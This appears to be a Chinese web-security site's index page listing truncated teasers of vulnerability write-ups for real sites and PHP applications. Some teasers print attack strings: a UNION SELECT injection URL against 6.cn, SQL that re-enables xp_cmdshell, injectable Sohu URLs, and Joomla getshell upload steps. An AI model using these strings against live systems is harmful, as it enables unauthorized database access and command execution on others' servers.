六间房一个sql注射 - 网站安全 - 自学php关注热度:15

某分站注入。详细说明：http://m.6.cn/watch_only.php?id=461277 and 1=2 UNION SELECT 1,group_concat(TABLE_NAME),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 frominformation_schema.TABLES whe.....[详情]

用sp_configure启用恢复xp_cmdshell 命令 - 网站安全关注热度:9

SQL代码;EXEC sp_configure show advanced options, 1;RECONFIGURE;EXEC sp_configure xp_cmdshell, 1;RECONFIGURE;--..[详情]

Story of a PoC - F5 BIG-IP Cookie Information Disclosure -关注热度:10

Curiosity is the biggest virtue of a hackerrsquo;s mindset. Only because curiosity people like me loose focus of the actual target and run behind the OTHER things. (Any.....[详情]

ShyPost企业网站管理系统V4.3注入XSS漏洞及后台拿关注热度:13

①注入漏洞 1.漏洞文件：Aboutus.asp % !--#include file=Inc/SysProduct.asp -- %Title=Trim(request(Title)) Set rs = Server.CreateObject(ADODB.Recordset) sql=select Content fro.....[详情]

安徽商网建站系统任意文件读取漏洞及修复 - 网关注热度:13

应厂商要求已删除。..[详情]

5个PHP安全措施 - 网站安全 - 自学php关注热度:13

多年来，PHP一直是一个稳定的、廉价的运行基于web应用程序的平台。像大多数基于web的平台一样，PHP也是容易受到外部攻击的。开发人员、数据库架构师和系统管理员在部署PHP应用程序..[详情]

腾讯QQ牧场秒刷300经验漏洞及修复 - 网站安全 -关注热度:13

腾讯旗下的应用QQ牧场，由于设计缺陷，存在可以秒刷300经验的漏洞。直接在post请求中将num改为100，再post就可以了实现打死100个蚊子，秒刷300经验了。设计缺陷，没有判断num的数量是不..[详情]

新浪微博jsonp跨域调用利用蠕虫 - 网站安全 - 自学关注热度:17

福建新浪个人中心调用的两个jsonp接口可以被恶意利用，获取好友信息，并利用cookie劫持无需其他授权发布欺骗信息。就像蠕虫一样传播。关键代码：head meta http-equiv=Content-Type content=te..[详情]

搜狐房产多处站点缺少权限验证及两个注入 - 网关注热度:8

http://sh.focus.cn/group/editphoto.php?group_id=1507photo_id=66772674上面是修改图片的下面是注入http://app.sh.sohu.com/rongwei/bk.php?id=12挺多库哈http://product.news.shou.com/news/babyplan/info.p.....[详情]

Tipask存储型的XSS漏洞 - 网站安全 - 自学php关注热度:9

Tipask问答系统是一款开放源码的PHP仿百度知道程序。以国人的使用习惯为设计理念，采用MVC构架，系统具有速度快，SEO友好，界面操作简洁明快等特点。天极网、戴尔中国、WPS office等大..[详情]

ECshop本地包含漏洞 - 网站安全 - 自学php关注热度:9

js/calendar.php$lang = (!empty($_GET[#39;lang#39;])) ? trim($_GET[#39;lang#39;]) : lsquo;zh_cnrsquo;;//没有过滤，很明显的包含漏洞if (!file_exists(lsquo;../languages/rsquo;. $lang .....[详情]

wordpress暴路径 影响所有版本 - 网站安全 - 自学关注热度:7

缺陷文件:http://www.2cto.com /{Path}/wp-includes/registration-functions.php 关键代码:-www.2cto.com?php/*** Deprecated. No longer needed.** @package WordPress*/_deprecated_file( basena.....[详情]

Joomla远程上传漏洞 可直接getshell - 网站安全 - 自关注热度:14

作者：13371. 有些joomal需要先注册.http://site/index.php?option=com_userview=login2. 到上传地址http://www.2cto.com /index.php?option=com_ksadvertiserItemid=36task=addcatid=0lang=en3. 点击i.....[详情]

315爱购程序任意文件源码查看 - 网站安全 - 自学关注热度:11

pic.phpfunction url_base64_decode($code){ if($code==) return ; $code=str_replace(!,#39;+#39;,$code); $code=str_replace(,,#39;/#39;,$code); $str=base64_decode($code); return $s.....[详情]

B2Bbuilder php SQL inj - 网站安全 - 自学php关注热度:11

产品介绍：B2Bbuilder能为您提供一个高效、稳定和强大的B2B电子商务行业门户网站解决方案.缺陷介绍：wap/index.phpif (!empty($_GET[action]))$action=$_GET[action];else$action=home;//$action=empty($.....[详情]